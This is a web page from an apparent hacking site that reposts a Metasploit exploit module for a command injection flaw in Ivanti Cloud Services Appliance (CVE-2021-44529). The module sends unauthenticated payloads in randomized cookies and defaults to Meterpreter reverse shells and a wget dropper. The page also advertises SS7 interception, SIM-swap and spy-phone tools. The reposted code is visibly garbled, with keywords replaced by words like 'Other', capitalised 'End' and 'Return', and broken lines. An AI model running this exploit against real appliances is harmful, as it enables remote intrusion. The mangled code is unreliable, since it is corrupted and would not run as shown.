• Advertise
  • SS7 Hacking
Saturday, February 4, 2023
No Result
View All Result
I Need Hack - Hacking Tutorials, News, Tips
  • Home
  • Exploits

    Lenovo Diagnostics Driver Memory Access

    macOS Dirty Cow Arbitrary File Write Local Privilege Escalation

    F5 Big-IP Create Administrative User

    Oracle Database 12.1.0.2 Spatial Component Privilege Escalation

    Packet Storm New Exploits For January, 2023

    io_uring Same Type Object Reuse Privilege Escalation

    vmwgfx Driver File Descriptor Handling Privilege Escalation

    eCommerce Marketplace Platform CMS 1.7 SQL Injection

    eCommerce Marketplace Platform CMS 1.7 Cross Site Scripting

    Trending Tags

    • sms exploit
    • ss7 software
    • simswap software
    • jpg exploit
    • kali linux
  • Hacking News
    Malicious Reward Apps Trick Over 2 Million Android Users

    Malicious Reward Apps Trick Over 2 Million Android Users

    New SH1MMER ChromeOS Exploit Jailbreaks Chromebooks

    New SH1MMER ChromeOS Exploit Jailbreaks Chromebooks

    Serious 2FA Bypass Vulnerability Affected Facebook And Instagram

    Serious 2FA Bypass Vulnerability Affected Facebook And Instagram

    Multiple Vulnerabilities In Yellowfin BI Could Allow RCE Attacks

    Multiple Vulnerabilities In Yellowfin BI Could Allow RCE Attacks

    LearnPress Plugin Vulnerabilities Risk Numerous WordPress Sites

    LearnPress Plugin Vulnerabilities Risk Numerous WordPress Sites

    TROJANPUZZLE Attack Forces AI Assistants to Suggest Rogue Coding

    Multiple Vulnerabilities Found In Samsung Galaxy App Store App

    Researchers Find Class Pollution-A Prototype Pollution Variant That Affects Python

    Be on the lookout for this AnyDesk Phishing campaign that delivers Vidar info stealer

  • Hacking Tools

    Test3213

    Test 2

    Test 2

    test

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Here are some tips for students to help protect their data privacy

    Client-Side Exploitation [FREE COURSE VIDEO]

    What Common Security Problems Are Cloud-Based Networks?

    Penetration testing OWASP Top 10 Vulnerabilities [FREE COURSE CONTENT]

    OSINT Fundamentals [FREE COURSE CONTENT]

    Trending Tags

    • hacking tools
    • hacking software
    • hacking tips
    • ss7 attacks
    • simswap software
    • sms exploit
  • Hacking Tutorials

    Test3213

    Test 2

    Test 2

    test

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Here are some tips for students to help protect their data privacy

    Client-Side Exploitation [FREE COURSE VIDEO]

    What Common Security Problems Are Cloud-Based Networks?

    Penetration testing OWASP Top 10 Vulnerabilities [FREE COURSE CONTENT]

    OSINT Fundamentals [FREE COURSE CONTENT]

  • Kali Linux
    ExchangeFinder : Find Microsoft Exchange Instance For A Given Domain And Identify The Exact Version

    ExchangeFinder : Find Microsoft Exchange Instance For A Given Domain And Identify The Exact Version

    Villain : Windows And Linux Backdoor Generator And Multi-Session Handler

    Villain : Windows And Linux Backdoor Generator And Multi-Session Handler

    PXEThief : Extract Passwords From The Operating System Deployment Functionality

    PXEThief : Extract Passwords From The Operating System Deployment Functionality

    The Terminal Application Cypherhound contains 260+ Neo4j Cyphers for BloodHound DataSets

    Subparse: Modular Malware Analysis Artifact Collection And Correlation Framework

    Should South East Asian Tech Startups Consider Outsourcing Support?

    Should South East Asian Tech Startups Consider Outsourcing Support?

    AzureHound : Azure Data Exporter For BloodHound

    Xerror is an automated penetration testing tool with GUI

    Mongoaudit is an audit and pentesting tool for MongoDB databases

    Trending Tags

    • kali linux
    • kali tools
    • hacking tools kali
    • kali hacking
    • pentesting
  • Security
    Beware: Malicious Apps On Apple & Google Play Push Users into Fake Investments

    Beware: Malicious Apps On Apple & Google Play Push Users into Fake Investments

    India’s Largest Truck Brokerage Company Leaking 140GB of Data

    India’s Largest Truck Brokerage Company Leaking 140GB of Data

    EV Charging Stations at Risk of DoS Attacks

    EV Charging Stations at Risk of DoS Attacks

    Most Important Computer Forensics Tools for 2023

    Most Important Computer Forensics Tools for 2023

    New DDoS-as-a-Service Platform Attacking Medical Institutions

    New DDoS-as-a-Service Platform Attacking Medical Institutions

    Hackers Use TrickGate Packer to Deploy Emotet, Cobalt Strike & Other Malware

    Hackers Use TrickGate Packer to Deploy Emotet, Cobalt Strike & Other Malware

    What is an OSINT Tool – Best OSINT Tools 2023

    What is an OSINT Tool – Best OSINT Tools 2023

    TrickGate: Malicious Software Outwitting Antivirus for 6 Years

    TrickGate: Malicious Software Outwitting Antivirus for 6 Years

    Over 1800 Android Mobile App Web Injects for Sale on Hacking Forums

    Over 1800 Android Mobile App Web Injects for Sale on Hacking Forums

  • Advertise
  • Home
  • Exploits

    Lenovo Diagnostics Driver Memory Access

    macOS Dirty Cow Arbitrary File Write Local Privilege Escalation

    F5 Big-IP Create Administrative User

    Oracle Database 12.1.0.2 Spatial Component Privilege Escalation

    Packet Storm New Exploits For January, 2023

    io_uring Same Type Object Reuse Privilege Escalation

    vmwgfx Driver File Descriptor Handling Privilege Escalation

    eCommerce Marketplace Platform CMS 1.7 SQL Injection

    eCommerce Marketplace Platform CMS 1.7 Cross Site Scripting

    Trending Tags

    • sms exploit
    • ss7 software
    • simswap software
    • jpg exploit
    • kali linux
  • Hacking News
    Malicious Reward Apps Trick Over 2 Million Android Users

    Malicious Reward Apps Trick Over 2 Million Android Users

    New SH1MMER ChromeOS Exploit Jailbreaks Chromebooks

    New SH1MMER ChromeOS Exploit Jailbreaks Chromebooks

    Serious 2FA Bypass Vulnerability Affected Facebook And Instagram

    Serious 2FA Bypass Vulnerability Affected Facebook And Instagram

    Multiple Vulnerabilities In Yellowfin BI Could Allow RCE Attacks

    Multiple Vulnerabilities In Yellowfin BI Could Allow RCE Attacks

    LearnPress Plugin Vulnerabilities Risk Numerous WordPress Sites

    LearnPress Plugin Vulnerabilities Risk Numerous WordPress Sites

    TROJANPUZZLE Attack Forces AI Assistants to Suggest Rogue Coding

    Multiple Vulnerabilities Found In Samsung Galaxy App Store App

    Researchers Find Class Pollution-A Prototype Pollution Variant That Affects Python

    Be on the lookout for this AnyDesk Phishing campaign that delivers Vidar info stealer

  • Hacking Tools

    Test3213

    Test 2

    Test 2

    test

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Here are some tips for students to help protect their data privacy

    Client-Side Exploitation [FREE COURSE VIDEO]

    What Common Security Problems Are Cloud-Based Networks?

    Penetration testing OWASP Top 10 Vulnerabilities [FREE COURSE CONTENT]

    OSINT Fundamentals [FREE COURSE CONTENT]

    Trending Tags

    • hacking tools
    • hacking software
    • hacking tips
    • ss7 attacks
    • simswap software
    • sms exploit
  • Hacking Tutorials

    Test3213

    Test 2

    Test 2

    test

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Here are some tips for students to help protect their data privacy

    Client-Side Exploitation [FREE COURSE VIDEO]

    What Common Security Problems Are Cloud-Based Networks?

    Penetration testing OWASP Top 10 Vulnerabilities [FREE COURSE CONTENT]

    OSINT Fundamentals [FREE COURSE CONTENT]

  • Kali Linux
    ExchangeFinder : Find Microsoft Exchange Instance For A Given Domain And Identify The Exact Version

    ExchangeFinder : Find Microsoft Exchange Instance For A Given Domain And Identify The Exact Version

    Villain : Windows And Linux Backdoor Generator And Multi-Session Handler

    Villain : Windows And Linux Backdoor Generator And Multi-Session Handler

    PXEThief : Extract Passwords From The Operating System Deployment Functionality

    PXEThief : Extract Passwords From The Operating System Deployment Functionality

    The Terminal Application Cypherhound contains 260+ Neo4j Cyphers for BloodHound DataSets

    Subparse: Modular Malware Analysis Artifact Collection And Correlation Framework

    Should South East Asian Tech Startups Consider Outsourcing Support?

    Should South East Asian Tech Startups Consider Outsourcing Support?

    AzureHound : Azure Data Exporter For BloodHound

    Xerror is an automated penetration testing tool with GUI

    Mongoaudit is an audit and pentesting tool for MongoDB databases

    Trending Tags

    • kali linux
    • kali tools
    • hacking tools kali
    • kali hacking
    • pentesting
  • Security
    Beware: Malicious Apps On Apple & Google Play Push Users into Fake Investments

    Beware: Malicious Apps On Apple & Google Play Push Users into Fake Investments

    India’s Largest Truck Brokerage Company Leaking 140GB of Data

    India’s Largest Truck Brokerage Company Leaking 140GB of Data

    EV Charging Stations at Risk of DoS Attacks

    EV Charging Stations at Risk of DoS Attacks

    Most Important Computer Forensics Tools for 2023

    Most Important Computer Forensics Tools for 2023

    New DDoS-as-a-Service Platform Attacking Medical Institutions

    New DDoS-as-a-Service Platform Attacking Medical Institutions

    Hackers Use TrickGate Packer to Deploy Emotet, Cobalt Strike & Other Malware

    Hackers Use TrickGate Packer to Deploy Emotet, Cobalt Strike & Other Malware

    What is an OSINT Tool – Best OSINT Tools 2023

    What is an OSINT Tool – Best OSINT Tools 2023

    TrickGate: Malicious Software Outwitting Antivirus for 6 Years

    TrickGate: Malicious Software Outwitting Antivirus for 6 Years

    Over 1800 Android Mobile App Web Injects for Sale on Hacking Forums

    Over 1800 Android Mobile App Web Injects for Sale on Hacking Forums

  • Advertise
No Result
View All Result
I Need Hack - Hacking Tutorials, News, Tips
SS7 SMS Intercept SS7 SMS Intercept SS7 SMS Intercept
Home Exploits

Command Injection by Ivanti Cloud Services Appliance CSA

by Ineedhack
January 18, 2023
in Exploits
0
80
SHARES
497
VIEWS
Share on FacebookShare on Twitter
Kripkey Spy Phone Kripkey Spy Phone Kripkey Spy Phone

##
# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

include Msf::Exploit::CmdStager

prepend Msf::Exploit::Remote::AutoCheck

def initialize (info = ).

super(

update_info(

info,

Name> => Ivanti Cloud Services Appliance CSA Command Injection’

‘Description’ => %q{

This module exploits a command injection flaw in the Ivanti Cloud Services Appliance. (CSA).

Ivanti Endpoint Management An injection vulnerability in Ivanti Endpoint Manager that is cookie-based

Cloud Services Appliance prior to 4.6.0-512: Unauthenticated users can use the Appliance

Execute arbitrary code only with restricted permissions Successful exploitation results

Execute commands as the “nobody” user.

},

‘License’ => MSF_LICENSE,

‘Author’ => [

‘Jakub Kramarz’, # Discovery

‘h00die-gr3y ‘ # MSF Module contributor

],

‘References’ => [

[‘CVE’, ‘2021-44529’],

[‘URL’, ‘https://forums.ivanti.com/s/article/SA-2021-12-02’],

[‘URL’, ‘https://attackerkb.com/topics/XTKrwlZd7p/cve-2021-44529’],

[‘EDB’, ‘50833’],

[‘PACKETSTORM’, ‘166383’]

],

‘DisclosureDate’ => ‘2021-12-02’,

‘Platform’ => [‘unix’, ‘linux’, ‘php’],

‘Arch’ => [ARCH_CMD, ARCH_X64, ARCH_PHP],

‘Privileged’ => false,

‘Targets’ => [

[

‘Unix Command’,

{

‘Platform’ => ‘unix’,

‘Arch’ => ARCH_CMD,

‘Type’ => :unix_cmd,

‘DefaultOptions’ => {

‘PAYLOAD’ => ‘cmd/unix/python/meterpreter/reverse_http’

}

}

],

[

‘PHP Command’,

{

‘Platform’ => ‘php’,

‘Arch’ => ARCH_PHP,

‘Type’ => :php_cmd,

‘DefaultOptions’ => {

‘PAYLOAD’ => ‘php/meterpreter/reverse_tcp’

}

}

],

[

‘Linux Dropper’,

{

‘Platform’ => ‘linux’,

‘Arch’ => [ARCH_X64],

‘Type’ => :linux_dropper,

‘CmdStagerFlavor’ => [‘wget’, ‘printf’, ‘echo’],

‘DefaultOptions’ => {

‘PAYLOAD’ => ‘linux/x64/meterpreter_reverse_http’

}

}

]

],

‘Payload’ => {

# BadChars> => *# We use this to indicate the payload in strings. Otherwise, it would be lost.

},

‘DefaultTarget’ => 0,

‘DefaultOptions’ => {

‘RPORT’ => 443,

True

},

‘Notes’ => {

‘Stability’ => [CRASH_SAFE],

‘Reliability’ => [REPEATABLE_SESSION],

‘SideEffects’ => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]

}

)

)

End

# Reverse the order of the cookie pairs.

def randomize_cookie(payload)

# The minimum number of cookies pairs that should exist is 4, with the first pair being at most 4.

# must always contain the value “ab”. The Nth cookie is in the request.

# N=no_of_cookies-2 should include the payload.

#

# example 1: Cookie: sG34st=ab;g3sBdnn=;h4hYyeEe=;j7sJJjjs=;

# example 2: Cookie: dvDfR6F=ab;bxvGE=;Fs=;uEn44Nkk=;nnXk=;

no_of_cookies = rand(4..8)

cookie_name = Rex::Text.rand_text_alphanumeric(1..8)

payload_cookie_number = (no_of_cookies – 2)

random_cookie = “#cookie_name=ab;”

for cookie_no in 2..no_of_cookies do

cookie_name = Rex::Text.rand_text_alphanumeric(1..8)

if cookie_no == payload_cookie_number

random_cookie << "#cookie_name=#payload;"

Other

random_cookie << "#cookie_name=;"

End

End

Return random_cookie

End

def check_vuln

# Check RCE using the CSA Version Banner stored at /etc/LDBUILD

payload = Base64.strict_encode64(‘readfile(“/etc/LDBUILD”);’)

cookie_payload = randomize_cookie(payload)

{return send_request_cgi(Return send_request_cgi (

‘method’ => ‘GET’,

‘uri’ => normalize_uri(target_uri.path, ‘client’, ‘index.php’),

‘cookie’ => cookie_payload.to_s

})

rescue StandardError => e

elog(“#peer – Communication error occurred: #e.message”, error: e)

Return null

End

execute_command = def execut_command (cmd)

Case target[‘Type”]

When :unix_cmd

payload = Base64.strict_encode64(“system(“#cmd”);”)

When :php_cmd

payload = Base64.strict_encode64(cmd.to_s)

When :linux_dropper

payload = Base64.strict_encode64(“system(“#cmd”);”)

End

cookie_payload = randomize_cookie(payload)

{return send_request_cgi(Return send_request_cgi (

‘method’ => ‘GET’,

‘uri’ => normalize_uri(target_uri.path, ‘client’, ‘index.php’),

‘cookie’ => cookie_payload.to_s

})

rescue StandardError => e

elog(“#peer – Communication error occurred: #e.message”, error: e)

fail_with(Failure::Unknown, “Communication error occurred: #e.message”)

End

def check

print_status(“Checking if #peer can be exploited.”)

res = check_vuln

return CheckCode::Unknown(‘No response received from the target.’) If you do not resend,

Return CheckCode::Safety unless res.code is > 200 and &&!res.body.blank && res.body =~ //

Start

parsed_html = Nokogiri::HTML.parse(res.body)

rescue Nokogiri::SyntaxError => e

return CheckCode::Unknown(“Unable to parse the HTTP response! Error: #e”)

End

csa_version = parsed_html.at_css(‘c123’)

if csa_version&.text&.blank?

CheckCode::Vulnerable(‘Could not retrieve version.’)

Other

CheckCode::Vulnerable(“Version: #csa_version.text”)

End

End

def exploit

Case target[‘Type”]

When :unix_cmd

print_status(“Executing #target.name with #payload.encoded”)

execute_command(payload.encoded)

When :php_cmd

print_status(“Executing #target.name with #payload.encoded”)

execute_command(payload.encoded)

When :linux_dropper

print_status(“Executing #target.name”)

execute_cmdstager(linemax: 262144)

End

End

End

Tags: hack newshacking softwarehacking tipshacking toolshacking tutorialsinstagram hackjpg exploitsms exploit
Ineedhack

Ineedhack

Next Post

Nissan customers get personal information from a third-party firm

Sim Swap Software Sim Swap Software Sim Swap Software

Recommended

Microsoft Outlook 2019 16.0.13231.20262 Remote code execution

3 months ago

Jettweb Ready Rent A car Script 4 Cross Site

2 weeks ago

Popular News

    • Advertise
    • SS7 Hacking

    ©2017- 2022 Hacking Tutorials

    No Result
    View All Result
    • Home
    • Exploits
    • Hacking News
    • Hacking Tools
    • Hacking Tutorials
    • Kali Linux
    • Security
    • Advertise